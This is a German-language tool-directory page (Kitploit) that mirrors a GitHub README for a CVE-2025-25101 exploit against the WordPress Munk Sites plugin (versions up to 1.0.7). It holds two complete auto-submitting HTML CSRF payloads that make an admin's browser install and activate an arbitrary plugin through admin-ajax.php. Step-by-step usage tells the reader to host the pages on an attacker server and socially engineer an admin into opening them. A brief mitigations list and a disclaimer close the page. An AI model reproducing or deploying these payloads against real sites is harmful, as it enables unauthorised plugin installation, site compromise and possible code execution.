Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-25101 — WordPress Munk Sites Plugin <= 1.0.7 - CSRF zu beliebiger Plugin-Installation Schwachstelle | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-25101
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPhishingSocial EngineeringLernen & Bildung
GitHubnxploited/cve-2025-25101

CVE-2025-25101

WordPress Munk Sites Plugin <= 1.0.7 - CSRF zu beliebiger Plugin-Installation Schwachstelle

Repository anzeigen
113vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🚀 CVE-2025-25101 - WordPress Munk Sites Plugin <= 1.0.7 - CSRF zur beliebigen Plugin-Installation

📌 Übersicht

CVE-2025-25101 ist eine Cross-Site-Request-Forgery (CSRF)-Sicherheitslücke im MetricThemes Munk Sites-Plugin für WordPress (Versionen ≤ 1.0.7).
Diese Sicherheitslücke ermöglicht es einem nicht authentifizierten Angreifer, einen Admin dazu zu bringen, beliebige Plugins zu installieren und zu aktivieren, was potenziell zu Remote Code Execution (RCE) oder einer Kompromittierung der Website führen kann.

🛑 Betroffene Versionen

  • Munk Sites Plugin <= 1.0.7
  • WordPress Jede Version, in der das Plugin aktiv ist

🛡️ Sicherheitsbewertung (CVSS-Score)

BewertungSchweregradVersionVektor-String
9.6🔥 KRITISCH3.1CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

🔥 Exploit-Beschreibung

🛠️ Wie die Sicherheitslücke funktioniert:

Der CSRF-Fehler im Munk Sites-Plugin erlaubt es einem Angreifer, einen angemeldeten WordPress-Admin zu zwingen, ein beliebiges WordPress-Plugin ohne dessen Zustimmung zu installieren und zu aktivieren.
Dies geschieht durch Ausnutzen einer ungeschützten admin-ajax.php-Anfrage, die keine CSRF-Token-Überprüfung besitzt.

📌 Exploit-Workflow:

  1. Der Angreifer erstellt eine bösartige Webseite, die die CSRF-Payload enthält.
  2. Das Opfer (WordPress-Admin) besucht die Webseite des Angreifers.
  3. Der Exploit sendet stillschweigend Anfragen an WordPress, um ein beliebiges Plugin zu installieren und zu aktivieren.
  4. Das Plugin wird ohne jegliche Admin-Interaktion installiert und aktiviert.

💻 Exploit-Code

1️⃣ CSRF-Exploit - Plugin installieren

Diese Payload zwingt das Opfer, das Plugin hello-world zu installieren.

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF Exploit - Plugin Installation</title>
    <style>
        body { font-family: Arial, sans-serif; text-align: center; background: #f4f4f4; padding: 20px; }
        h1 { color: #d9534f; } h2 { color: #5bc0de; }
        .output { margin-top: 20px; padding: 10px; background: white; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); }
        .success { color: #5cb85c; font-weight: bold; }
    </style>
</head>
<body onload="document.forms[0].submit()">
    <h1>📌 CVE-2025-25101</h1>
    <h2>CSRF Exploit - Install 'Hello World' Plugin</h2>
    <h3>🚀 Exploit by: <b>Nxploit | Khaled Alenazi</b></h3>
    <div class="output" id="output">🔄 Installing plugin...</div>
    <form action="http://target.com/wp-admin/admin-ajax.php" method="GET">
        <input type="hidden" name="action" value="cs_install_plugin">
        <input type="hidden" name="plugin" value="hello-world">
    </form>
    <script>setTimeout(() => { document.getElementById("output").innerHTML = "<span class='success'>✅ Plugin installed successfully!</span>"; }, 5000);</script>
</body>
</html>

2️⃣ CSRF-Exploit - Plugin aktivieren

Diese Payload zwingt das Opfer, das Plugin hello-world zu aktivieren.

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF Exploit - Plugin Activation</title>
    <style>
        body { font-family: Arial, sans-serif; text-align: center; background: #f4f4f4; padding: 20px; }
        h1 { color: #d9534f; } h2 { color: #f0ad4e; }
        .output { margin-top: 20px; padding: 10px; background: white; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); }
        .success { color: #5cb85c; font-weight: bold; }
    </style>
</head>
<body onload="document.forms[0].submit()">
    <h1>📌 CVE-2025-25101</h1>
    <h2>CSRF Exploit - Activate 'Hello World' Plugin</h2>
    <h3>🚀 Exploit by: <b>Nxploit | Khaled Alenazi</b></h3>
    <div class="output" id="output">🔄 Activating plugin...</div>
    <form action="http://target.com/wp-admin/admin-ajax.php" method="GET">
        <input type="hidden" name="action" value="cs_active_plugin">
        <input type="hidden" name="plugin" value="hello-world">
    </form>
    <script>setTimeout(() => { document.getElementById("output").innerHTML = "<span class='success'>✅ Plugin activated successfully!</span>"; }, 5000);</script>
</body>
</html>

🔥 Verwendung

  1. Hosten Sie die bösartigen HTML-Dateien (install.html und activate.html) auf einem vom Angreifer kontrollierten Server.
  2. Manipulieren Sie einen WordPress-Admin sozial, um install.html zu besuchen.
  3. Sobald das Plugin installiert ist, locken Sie das Opfer, activate.html zu besuchen.
  4. Das hello-world-Plugin wird ohne Admin-Zustimmung installiert und aktiviert!

🚧 Gegenmaßnahmen

🔒 So schützen Sie Ihre WordPress-Seite:

  • Aktualisieren Sie auf die neueste Version des Munk Sites-Plugins (falls ein Patch verfügbar ist).
  • Verwenden Sie ein WordPress-Sicherheitsplugin wie Wordfence oder Sucuri, um CSRF-Versuche zu blockieren.
  • Schränken Sie den Zugriff auf admin-ajax.php mit Sicherheitsregeln in der .htaccess- oder Nginx-Konfiguration ein.
  • Stellen Sie sicher, dass nur authentifizierte und autorisierte Benutzer Plugins installieren oder aktivieren können.
  • Implementieren Sie CSRF-Schutz mit wp_nonce_field() und check_admin_referer()

📜 Haftungsausschluss

⚠️ Dieser Exploit dient nur zu Bildungs- und Sicherheitsforschungszwecken.
⚠️ Die unbefugte Nutzung gegen Systeme ohne ausdrückliche Genehmigung ist illegal.
⚠️ Der Autor übernimmt keine Verantwortung für den Missbrauch dieses Codes.


⭐ Unterstützung & Beiträge

Wenn Sie diese Forschung wertvoll finden, können Sie gerne ⭐ das Repository mit einem Stern markieren und durch die Meldung neuer Schwachstellen beitragen.

Von: Nxploit | Khaled Alenazi

Tool herunterladen